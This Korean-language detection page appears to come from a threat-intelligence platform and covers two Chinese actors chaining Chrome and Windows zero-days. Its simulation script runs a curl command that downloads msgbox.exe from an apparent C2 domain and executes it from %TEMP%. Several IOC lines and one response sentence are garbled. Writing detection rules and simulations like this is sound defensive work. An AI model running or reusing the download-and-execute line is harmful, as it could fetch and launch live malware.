중국 위협 행위자, 브라우저 및 윈도우 제로데이 연결
Detection stack
- AIDR
- Alert
- ETL
- Query
개요
두 개의 중국 위협 행위자인 UTA0560과 JungleBamboo가 Google Chrome과 Windows 커널을 대상으로 한 정교한 다단계 익스플로잇 체인을 사용하고 있습니다. 이 공격은 취약점이 Chromium에서 수정된 후 출시된 Google Chrome 버전에 대응하는 업데이트가 도달하기 전에 패치 갭 창을 이용합니다. 스피어 피싱 미끼로 GRIMWEDGE JScript 백도어와 LONGTALE Chrome 확장 프로그램을 포함한 다양한 페이로드를 전달합니다.
조사
Volexity의 네트워크 보안 모니터링은 2026년 9월 1일 비정부 기구(NGO)를 대상으로 하는 스피어 피싱 캠페인을 식별했습니다. 조사를 통해 CVE-2026-85046, CVE-2026-87491 및 CVE-2026-85880을 포함하는 공유 익스플로잇 체인이 발견되었습니다. 분석가는 UTA0560의 GRIMWEDGE 배포 활동과 JungleBamboo의 SUPERSTOMP를 통해 LONGTALE 확장을 설치하는 활동으로 두 개의 클러스터를 나눴습니다.
완화
조직은 패치 갭 기간 동안 노출을 줄이기 위해 Google Chrome을 최신 버전으로 유지해야 합니다. 보안 팀은 비정상적인 Chrome 하위 프로세스 동작과 승인되지 않은 Chrome 확장 설치를 모니터링해야 합니다. 스피어 피싱 미끼에 대한 강력한 이메일 필터링과 의심스럽거나 승인되지 않은 예약된 작업 생성에 대한 모니터링도 권장됩니다.
대응
익스플로잇이 탐지되면, 영향을 받은 호스트는 추가적인 명령 및 제어 통신이나 횡적 이동을 방지하기 위해 즉시 격리되어야 합니다. 대응자는 크롬 프로세스에 대한 메모리 포렌식을 수행하여 주입된 셸 코드를 식별해야 합니다. 설치된 Chrome 확장도 감사해야 하며, 예약된 작업은 Windows Schedule System.
공격 흐름
이 부분은 아직 업데이트 중입니다.
탐지
의심스러운 CURL 사용 방법 (cmdline 통해)
비정상적인 최상위 도메인(TLD) DNS 요청을 통한 의심스러운 명령 및 제어(dns 통해)
의심스러운 예약된 작업 (감사를 통해)
탐지를 위한 IOC (HashSha256): 패치 갭 주의: 여러 중국 위협 행위자가 Chrome 및 Windows에서 0-day 익스플로잇 체인을 사용
탐지를 위한 IOC (SourceIP): 패치 갭 주의: 여러 중국 위협 행위자가 Chrome 및 Windows에서 0-day 익스플로잇 체인을 사용
탐지를 위한 IOC (DestinationIP): 패치 갭 주의: 여러 중국 위협 행위자가 Chrome 및 Windows에서 0-day 익스플로잇 체인을 사용
Chrome 제로데이 익스플로잇 체인 랜딩 페이지 [웹 서버]
GRIMWEDGE JScript 백도어 및 페이로드 전달 활동 탐지 [Windows 프로세스 생성]
시뮬레이션 실행
-
공격 서사 및 명령어: 적은 GRIMWEDGE JScript 백도어를 배포하여 손상된 시스템의 발판을 마련하려고 합니다. 단순 서명 기반 AV에 탐지되지 않기 위해 공격자는
cmd.exe와 기본curl유틸리티를 사용하여 2단계 로더인msgbox.exe를 원격 명령 및 제어 (C2) 인프라에서 다운로드 합니다. 다운로드 완료 후, 공격자는 즉시 페이로드를%TEMP%디렉토리에서 실행하여 파일이 디스크에서 보내는 시간을 최소화하고 기본 모니터링에서 종종 간과되는 디렉토리를 활용합니다. 이 시퀀스는 탐지 규칙이 찾고 있는 특정 명령줄 패턴과 일치하도록 설계되었습니다. -
회귀 테스트 스크립트:
# GRIMWEDGE 탐지 규칙을 트리거하기 위한 시뮬레이션 스크립트입니다. # 이 스크립트는 다운로드된 페이로드를 시뮬레이션하기 위해 더미 파일을 생성합니다. $tempDir = $env:TEMP $payloadName = "msgbox.exe" $payloadPath = Join-Path $tempDir $payloadName # 1. 다운로드된 페이로드를 시뮬레이션하기 위해 "msgbox.exe" 더미를 만듭니다 # 실제 공격에서는 실제 악성 바이너리가 될 것입니다. New-Item -Path $payloadPath -ItemType File -Force Set-Content -Path $payloadPath -Value "Dummy Payload Content" # 2. 탐지 논리에서 식별된 정확한 명령 문자열을 실행합니다. # 참고: URL을 위해 로컬 에코/모의 접근 방식을 사용하여 명령 문자열이 정확하게 일치하도록 합니다. cmd.exe /c "curl -f -sS -o ""$tempDirmsgbox.exe"" ""https://cloud.shinewrist.net/test/msgbox.exe"" && ""$tempDirmsgbox.exe""" Write-Host "시뮬레이션 완료. GRIMWEDGE 패턴과 일치하는 경고를 SIEM에서 확인하세요." -
정리 명령:
# 다운받은 페이로드와 파일을 제거하기 위한 정리 스크립트. $tempDir = $env:TEMP $payloadPath = Join-Path $tempDir "msgbox.exe" if (Test-Path $payloadPath) { Remove-Item -Path $payloadPath -Force Write-Host "정리 완료: $payloadPath 제거됨." } else { Write-Host "페이로드가 발견되지 않았습니다. 정리가 필요하지 않습니다." }